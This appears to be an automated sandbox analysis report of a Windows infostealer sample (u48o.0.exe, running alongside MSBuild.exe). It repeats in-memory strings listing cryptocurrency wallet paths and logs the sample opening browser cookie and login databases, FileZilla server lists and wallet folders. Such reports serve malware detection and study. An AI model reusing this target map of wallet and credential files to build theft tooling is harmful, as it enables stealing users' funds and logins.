Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
